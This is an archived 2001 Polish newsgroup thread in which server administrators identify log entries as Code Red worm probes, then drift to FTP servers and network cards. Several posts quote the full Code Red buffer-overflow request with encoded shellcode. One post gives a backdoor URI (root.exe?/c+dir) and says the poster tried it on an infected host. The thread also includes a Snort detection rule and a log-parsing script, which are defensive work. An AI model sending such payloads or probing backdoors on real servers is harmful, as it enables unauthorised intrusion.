Czyzby proba ataku na serwer www ?

Jackobi - 2 Sie 2001, 03:48

W logach mam cos takiego :

ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u
7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319

oczywiscie w jednej linijce...

Czyzby ktos szukal dziury w serwerze www?
Ja mam Apache 1.3.20, wiec pewnie nie zadzialalo, ale ciekawe czy dziala na
IIS4/5 ?

Jak ktos cos wie to niech sie wypowie :)

Witek Prytek - 2 Sie 2001, 04:13

W logach mam cos takiego :

ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u

7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319

oczywiscie w jednej linijce...

Czyzby ktos szukal dziury w serwerze www?
Ja mam Apache 1.3.20, wiec pewnie nie zadzialalo, ale ciekawe czy dziala
na
IIS4/5 ?

Jak ktos cos wie to niech sie wypowie :)

W ciagu ostatnich 2 tygodni na tej grupie bylo kilka postow na ten temat -
znajdz je a dowiesz sie wszystkiego.

Maciej Gruszecki - 2 Sie 2001, 08:37

W ciagu ostatnich dwóch dni przybywa mi co najmniej jeden taki wpis na
godzine. Za kazdym razem spod innego adresu (nie wiem, czy próby sa
powtarzane spod jednego adresu kilka razy, bo konsekwetnie wszystkie
zarejestrowane IP dopisuje do reguly REJECT).

Pear

W logach mam cos takiego :

ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u

7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319

oczywiscie w jednej linijce...

Czyzby ktos szukal dziury w serwerze www?
Ja mam Apache 1.3.20, wiec pewnie nie zadzialalo, ale ciekawe czy dziala
na
IIS4/5 ?

Jak ktos cos wie to niech sie wypowie :)

--

pzdr.

## admin AWP.net http://awp.waw.pl

Michal Szokolo - 3 Sie 2001, 03:16

W logach mam cos takiego :

ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN

Code Red pukał. IIS nie było, to sobie poszedł dalej...

Jackobi - 3 Sie 2001, 03:17

| W logach mam cos takiego :

| ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
| /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
W ciagu ostatnich 2 tygodni na tej grupie bylo kilka postow na ten temat -
znajdz je a dowiesz sie wszystkiego.

Sorry wielkie i dzieki za uwage.
Wlasnie od jakis 2 tygodni zrobilem sobie chwilowy odpoczynek od grup
security i linux i stad moje pytanie, ktorego mozna bylo uniknac...
Ale juz postaram sie wrocic do obiegu ;)

Tomasz Piłat - 3 Sie 2001, 16:51

konsekwetnie wszystkie zarejestrowane IP dopisuje do reguly REJECT).

A możesz mi powiedzieć po co to robisz?

Poncki

Dariusz_Brzeziński - 6 Sie 2001, 05:22

W logach mam cos takiego :

ool-18bd5c1f.dyn.optonline.net - - [01/Aug/2001:18:29:01 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u
7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 319

oczywiscie w jednej linijce...

Czyzby ktos szukal dziury w serwerze www?
Ja mam Apache 1.3.20, wiec pewnie nie zadzialalo, ale ciekawe czy dziala na
IIS4/5 ?

Jak ktos cos wie to niech sie wypowie :)

najgorsze, ze dotychczas w/w wpisy dotyczyly hostow zza atlantyku.
Teraz jednak mamy juz je w Polsce:

pa90.warszawa.sdi.tpnet.pl - - [04/Aug/2001:21:53:13 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
90%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 920

pe129.lublin.sdi.tpnet.pl - - [04/Aug/2001:20:28:22 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909
0%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 920

pb238.suwalki.sdi.tpnet.pl - - [04/Aug/2001:18:43:09 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
90%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 920

Pawel Krawczyk - 6 Sie 2001, 05:54

najgorsze, ze dotychczas w/w wpisy dotyczyly hostow zza atlantyku.
Teraz jednak mamy juz je w Polsce:

Code Red ma o wiele efektywniejszy algorytm generowania adresow IP
potencjalnych ofiar. Prawdopodobienstwo ze sprawdzi adres w tej samej
klasie B jest o wiele wieksze, niz ze bedzie to jakis adres na innym
kontynencie. Stad m.in. wynika fakt ze nasz IDS wylapal w ciagu
ostatniej nocy ok. 20 prob infekcji, z czego 15 bylo w tej samej
klasie B (217.96, czyli Tepsa) a 5 w tej samej klasie A (rozne 217).

Nowy Code Red instaluje tez na zarazonym hoscie trojana, do ktorego
mozna sie odwolywac przez URI:

http://217.96.XXX.XXX/c/inetpub/scripts/root.exe?/c+dir

Sprawdzilem, dziala.

Wyglada na to, ze autorzy wirusow znalezli nowe atrakcyjne srodowisko
i sa na etapie wyscigu technologicznego pt. ,,czyj wirus lepszy''. Niedlugo
pewnie zaczna sie pojawiac znane z czasow DOSa usprawnienia w rodzaju
wirusow polimorficznych, generatorow wirusow, skuteczniejsze ukrywanie
w systemie itp.

Ciekawe, ktory z kolejnych Code Red zacznie wysylac na newsy przypadkowe
pliki .doc znalezione na serwerze? ;)

BTW jesli korzystacie ze Snorta (www.snort.org) to warto uruchamiac
wysylajac do Securityfocus adresy IP zarazonych hostow. Oni automatycznie
wysylaja do nich powiadomienia o infekcji - do wczoraj wyslali ok. 400
tys. Ponizej moje skrypty:

============ crontab =========

============ crontab =========

============ snort_ida.pl ====
#!/usr/bin/perl

open AL, "/var/log/snort/alert" || die "Cannot open: $!";

while(<AL)
{
/IDS552/ && do { $iis = 1; };
/(\d+)\/(\d+)-(\d+:\d+:\d+)\.\d+\s(\d+\.\d+\.\d+\.\d+)/ && do {
if($iis == 1) {
$month=$1; $day=$2; $time=$3; $ip=$4; $iis = 0;
print "$ip 2001-$month-$day $time\n";
}
};

}

close AL;
============ snort_ida.pl ====

Ten skrypt zaklada, ze Snort korzysta z regulek Vision
(www.whitehats.com/ids/), konkretnie ta regulka ma postac:

============ vision.rules ====
alert TCP $EXTERNAL any -$INTERNAL 80 (msg: "IDS552/web-iis_IIS ISAPI Overflow ida"; dsize: 239; flags: A+; uricontent: ".ida?"; classtype: system-or-info-attempt; reference: arachnids,552;)
============ vision.rules ====

Maciej Gruszecki - 6 Sie 2001, 06:04

W około 40% te adresy pokrywają się z tymi, spod których wcześniej już
zarejestrowałem próby skanowania otwartych portów. I po to dopisuję, że być
może jest to więcej niż te 40% (poza tym zawsze można to przecież usunąć za
jakiś czas).
Od tego weekendu przestałem już w ogóle zwracać uwagi na te wpisy w logach.
W tej chwili jest ich więcej niż odwiedzin :-)))))))).

Pear

| konsekwetnie wszystkie zarejestrowane IP dopisuje do reguly REJECT).
A możesz mi powiedzieć po co to robisz?

Poncki

Pawel Krawczyk - 6 Sie 2001, 07:09

Code Red ma o wiele efektywniejszy algorytm generowania adresow IP

Mialem na mysli oczywiscie Code Red II.

Na liscie Cypherpunks natomiast pojawil sie bardzo ciekawy pomysl (i
prototypowa implementacja) wirusa, ktory rozmnaza sie tak samo jak CR2,
ale po infekcji sciaga i instaluje hotfix na zarazony serwer. Podejrzewam
ze jest to jedyna skuteczna metoda zakonczenia fali Code Red na tysiacach
serwerow, ktorych administratorzy uwierzyli w Zero Administration w
Windows ;)

Tomasz Piłat - 6 Sie 2001, 07:24

W około 40% te adresy pokrywają się z tymi, spod których wcześniej już
zarejestrowałem próby skanowania otwartych portów. I po to dopisuję, że być
może jest to więcej niż te 40% (poza tym zawsze można to przecież usunąć za
jakiś czas).

A czy nie lepiej poświęcić ten czas na zabezpieczenie serwera?

Poncki

Tomasz Piłat - 6 Sie 2001, 07:26

Na liscie Cypherpunks natomiast pojawil sie bardzo ciekawy pomysl (i
prototypowa implementacja) wirusa, ktory rozmnaza sie tak samo jak CR2,
ale po infekcji sciaga i instaluje hotfix na zarazony serwer.

Jej, przecież to się da 'workaroundować' kilkoma manipulacjami
w rejestrze (o ile nie używa się index servera...).

Poncki

Pawel Krawczyk - 6 Sie 2001, 07:54

| Na liscie Cypherpunks natomiast pojawil sie bardzo ciekawy pomysl (i
| prototypowa implementacja) wirusa, ktory rozmnaza sie tak samo jak CR2,
| ale po infekcji sciaga i instaluje hotfix na zarazony serwer.
Jej, przecież to się da 'workaroundować' kilkoma manipulacjami
w rejestrze (o ile nie używa się index servera...).

Ja sie nie znam, tylko cytuje co oni tam pisali. Moze uzywaja
workarounda, tylko zle zrozumialem.

Maciej Gruszecki - 6 Sie 2001, 09:01

Nie mam IIS (jak również wysoce stabilnych Windows :)))) ), tylko Apache (na
przeciętnym Linuksie), a ten jak na razie ma się dobrze po wszelkich
możliwych uzupełnieniach. Nie znalazłem natomiast jak do tej pory porządnego
FTP i niestety jak na razie jest zablokowany dla świata.
Poza tym nie narzekam. No chyba, że gdzieś jeszcze jestem "dziurawy", tylko
jeszcze o tym nie wiem.

Pear

PS. Intranetowy Windows NT wywalił się ostatnio z powodu ..... zbyt szybkiej
transmisji :)))) Podłączyłem go do sieci 100Base-TX i nie zdążył obsłużyć
wszystkich IRQ przychodzących od karty sieciowej (2 procesory PIII 733 MHz).

| W około 40% te adresy pokrywają się z tymi, spod których wcześniej już
| zarejestrowałem próby skanowania otwartych portów. I po to dopisuję, że
być
| może jest to więcej niż te 40% (poza tym zawsze można to przecież usunąć
za
| jakiś czas).
A czy nie lepiej poświęcić ten czas na zabezpieczenie serwera?

Poncki

Pawel Krawczyk - 6 Sie 2001, 10:05

Nie mam IIS (jak również wysoce stabilnych Windows :)))) ), tylko Apache (na
przeciętnym Linuksie), a ten jak na razie ma się dobrze po wszelkich
możliwych uzupełnieniach. Nie znalazłem natomiast jak do tej pory porządnego
FTP i niestety jak na razie jest zablokowany dla świata.
Poza tym nie narzekam. No chyba, że gdzieś jeszcze jestem "dziurawy", tylko
jeszcze o tym nie wiem.

Dobrą historię ma ftpd-BSD (jedna wpadka, ale we wszystkich BSD). Jest jeszcze
coś takiego jak vsftpd (http://sourceforge.net/projects/vsftpd/), wygląda
bezpiecznie ale nie testowałem.

PS. Intranetowy Windows NT wywalił się ostatnio z powodu ..... zbyt szybkiej
transmisji :)))) Podłączyłem go do sieci 100Base-TX i nie zdążył obsłużyć
wszystkich IRQ przychodzących od karty sieciowej (2 procesory PIII 733 MHz).

To akurat może przeszkadzać i Linuxowi, jeśli karta będzie wyjątkowo
lame (np. RTL-8139). W serwerach opłaca się używać dobrych kart,
np. Intel EtherExpress Pro/100 albo DEC Tulip.

smarkacz - 7 Sie 2001, 03:06

Na liscie Cypherpunks natomiast pojawil sie bardzo ciekawy pomysl (i
prototypowa implementacja) wirusa, ktory rozmnaza sie tak samo jak
CR2, ale po infekcji sciaga i instaluje hotfix na zarazony serwer.

Na polipie też się taki pomysł pojawił, tylko bez implementacji. Nie
muszę chyba pisać, czyj. ;-) Zresztą nie tam pierwszy, wcześniej był
na securityfocus (nie pamiętam, która lista).

Podejrzewam ze jest to jedyna skuteczna metoda zakonczenia fali Code
Red na tysiacach serwerow, ktorych administratorzy uwierzyli w Zero
Administration w Windows ;)

Eh. Ile to już się ludzie rozpisywali o "dobrych" wirusach.

ps. Mam nadzieję, że ten cały pomysł to niezbyt mądry dowcip. Serio.
ps2. Tak, nie czytam cypherpunks.

TMERLIN - 7 Sie 2001, 03:47

Czy ktos z was zauwazym od pewnego czasu ze po sieci nie chodza pakiety
ICMP ( PING ) ??? Z mojego serwera moge pingnac wezel POLPAKA ale poza
niegu juz nic nie idzie. Oczywiscie pozostale uslugi chodza ( www, ftp
,ssh ). Czy ktos moze wie co TPSA robi ????

<-=MERLIN=-

Maciej Gruszecki - 7 Sie 2001, 08:28

| PS. Intranetowy Windows NT wywalił się ostatnio z powodu ..... zbyt
szybkiej
| transmisji :)))) Podłączyłem go do sieci 100Base-TX i nie zdążył
obsłużyć
| wszystkich IRQ przychodzących od karty sieciowej (2 procesory PIII 733
MHz).

To akurat może przeszkadzać i Linuxowi, jeśli karta będzie wyjątkowo
lame (np. RTL-8139). W serwerach opłaca się używać dobrych kart,
np. Intel EtherExpress Pro/100 albo DEC Tulip.

Karta 3Com 3C905-TX z włączoną opcją minimalnego użycia procesora. To chyba
dobra karta ?

Pear

ZIS - 9 Sie 2001, 08:20

Karta 3Com 3C905-TX z włączoną opcją minimalnego użycia procesora. To chyba
dobra karta ?

Dobra dla zwyklego kompa ... nie oznacza dobra dla serwera

Tomasz Piłat - 9 Sie 2001, 09:00

| Karta 3Com 3C905-TX
Dobra dla zwyklego kompa ... nie oznacza dobra dla serwera

A czemu uważasz, że ta karta się nie nadaje?

Poncki
PS. Masz problem z references....

ZIS - 9 Sie 2001, 09:03

A czemu uważasz, że ta karta się nie nadaje?

No najlepsza do serwera to nie jest ...
chociazby dla tego ze 3com karty specjalnie do serwerow nazywa

Poncki
PS. Masz problem z references....

kurde sam sie zastanawiam jak ja to zrobilem :-))))

Pawel Krawczyk - 9 Sie 2001, 09:24

| Karta 3Com 3C905-TX
| Dobra dla zwyklego kompa ... nie oznacza dobra dla serwera
A czemu uważasz, że ta karta się nie nadaje?

To jest chyba kwestia ilości generowanych przerwań, tanie karty
znacznie bardziej obciążają procesor - to samo masz zresztą np.
w przypadku wieloportowych kart szeregowych. Głupia Boca wykorzystuje
procesor hosta, a np. Cyclades mają własny procesor.

Ale akurat chyba 3COM 3c905 należy do tych lepszych, tak mi się
przynajmniej wydaje.

Tomasz Piłat - 10 Sie 2001, 05:22

To jest chyba kwestia ilości generowanych przerwań, [...]
Ale akurat chyba 3COM 3c905 należy do tych lepszych, tak mi się
przynajmniej wydaje.

Mi też, nigdy nie miałem problemów z wydajnościa systemu/procesora
przy prawie całkowitym wysyceniu 100Mbps (3com----cross-over-----3com).

Poncki

Robert Redziak - 12 Sie 2001, 13:56

| To akurat może przeszkadzać i Linuxowi, jeśli karta będzie wyjątkowo
| lame (np. RTL-8139). W serwerach opłaca się używać dobrych kart,
| np. Intel EtherExpress Pro/100 albo DEC Tulip.

Karta 3Com 3C905-TX z włączoną opcją minimalnego użycia procesora. To chyba
dobra karta ?

Akurat wiele osób twierdzi, że w warunkach dużego
obciążenia EtherExpress Pro zachowuje się lepiej od 3Coma
(a przy okazji jest tańsza).

Pozdrawiam.